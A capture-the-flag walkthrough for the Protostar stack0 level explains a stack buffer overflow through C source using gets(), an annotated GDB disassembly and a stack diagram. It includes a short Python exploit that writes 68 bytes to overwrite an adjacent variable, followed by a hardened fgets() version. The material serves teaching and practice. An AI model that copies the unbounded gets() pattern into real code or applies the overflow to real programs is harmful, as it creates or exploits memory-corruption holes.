### Binary Exploitation Protostar Stack0 - Walkthrough

In this post, I am going to show you how we can beat the Protostar stack0 level. Basically, the main goal here is to understand how the program actually works in memory, so that every concept behind the overflow becomes clear.

#### Before starting this walkthrough, a few points

• I'm not the creator of the Protostar war game; I am just a player.
• Here I am just providing hints and references, so that if you feel stuck anywhere you can take a look here.
• For a practical hint, check the YouTube video given below.

### Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;   /* lives just above buffer on the stack */
  char buffer[64];

  modified = 0;
  gets(buffer);            /* no length limit: the overflow happens here */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
```

### Disassembly Of Main Function (Using GDB)

```
########################################################################################################
[ main reserves 0x60 bytes of stack space for its locals: 0x60 in hex is 96 in decimal ]
########################################################################################################

[-------------------------------------code-------------------------------------]
0x80483f5 <main+1>: mov    ebp,esp                          <<=== Set up the new frame base (EBP = ESP); the old EBP was pushed at main+0
0x80483f7 <main+3>: and    esp,0xfffffff0                   <<=== Align the stack pointer to 16 bytes
0x80483fa <main+6>: sub    esp,0x60                         <<=== Reserve 0x60 = 96 bytes of stack space for the locals
=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== modified = 0: store 0 at esp+0x5c, i.e. bytes 92..95 of the frame
0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== Load the address esp+0x1c (byte 28, the start of buffer) into EAX;
                                                                   it is then placed on the stack as the argument for gets()
0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Store EAX at [esp]: the first (and only) argument of gets()
0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Call gets(buffer)
0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Load modified (bytes 92..95) into EAX for the comparison
```

### Situation On Stack

```
0               28                                             92         96
============================================================================
Other things    | buffer (64 bytes)                            | modified |
============================================================================
                ^                                              ^
                |                                              |
      gets() writes from here                        target area (4 bytes)
```

### Exploit

```
#!/usr/bin/python
import sys

# Offsets taken from the disassembly above:
# 0x80483fa <main+6>:  sub    esp,0x60                 ==> 0x60 = 96 bytes of locals
# 0x8048405 <main+17>: lea    eax,[esp+0x1c]           ==> buffer starts at esp+28
# 0x804840c <main+24>: call   0x804830c <gets@plt>     ==> gets(buffer), no length check
# 0x80483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0 ==> modified lives at esp+92
# Distance from the start of buffer to modified: 0x5c - 0x1c = 64 bytes

payload  = 'a' * 64          # fills the buffer variable completely
payload += 'b' * 4           # spills into the modified variable (any non-zero value wins)

# Write the payload to stdout, then redirect it into the binary:
#   python stack0.py > tmp && ./bin/stack0 < tmp
sys.stdout.write(payload + '\n')
```
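For contrast with the gets() call that makes the level solvable, here is a hardened counterpart of stack0's main() that reads with fgets() bounded by the buffer size, plus a small harness that feeds it the 64 + 4 byte payload from the exploit above. This is an added example and not the Protostar source; the names stack0_hardened and run_with_payload are chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Hardened counterpart of stack0's main() (added example, not the Protostar
 * source): same two locals, but fgets() bounded by sizeof(buffer) replaces
 * gets(), so an over-long line can no longer spill into 'modified'.
 * Returns the value of 'modified' after the read and stores strlen(buffer). */
int stack0_hardened(FILE *in, size_t *stored)
{
    volatile int modified;
    char buffer[64];
    modified = 0;
    /* fgets writes at most sizeof(buffer) - 1 = 63 bytes plus a NUL. */
    if (fgets(buffer, sizeof buffer, in) == NULL)
        return -1;                          /* EOF or read error */
    if (stored != NULL)
        *stored = strlen(buffer);
    /* If the line did not fit, discard its tail so it cannot feed the
     * next read (the usual fgets-truncation pitfall). */
    if (strchr(buffer, '\n') == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return modified;
}

/* Harness: build a constructed line of n_a 'a's then n_b 'b's (the page's
 * payload is n_a = 64, n_b = 4), feed it through a tmpfile() and return what
 * stack0_hardened() reports. With (64, 4) it returns 0 and stores 63. */
int run_with_payload(size_t n_a, size_t n_b, size_t *stored)
{
    char line[256];
    size_t len = n_a + n_b + 1;             /* payload plus newline */
    if (len >= sizeof line)
        return -1;
    memset(line, 'a', n_a);
    memset(line + n_a, 'b', n_b);
    line[n_a + n_b] = '\n';
    FILE *in = tmpfile();
    if (in == NULL || fwrite(line, 1, len, in) != len) {
        if (in != NULL) fclose(in);
        return -1;
    }
    rewind(in);
    int result = stack0_hardened(in, stored);
    fclose(in);
    return result;
}
```

With the original gets() the same 68-byte line lands the four 'b's in modified; here only 63 bytes are stored and modified stays 0.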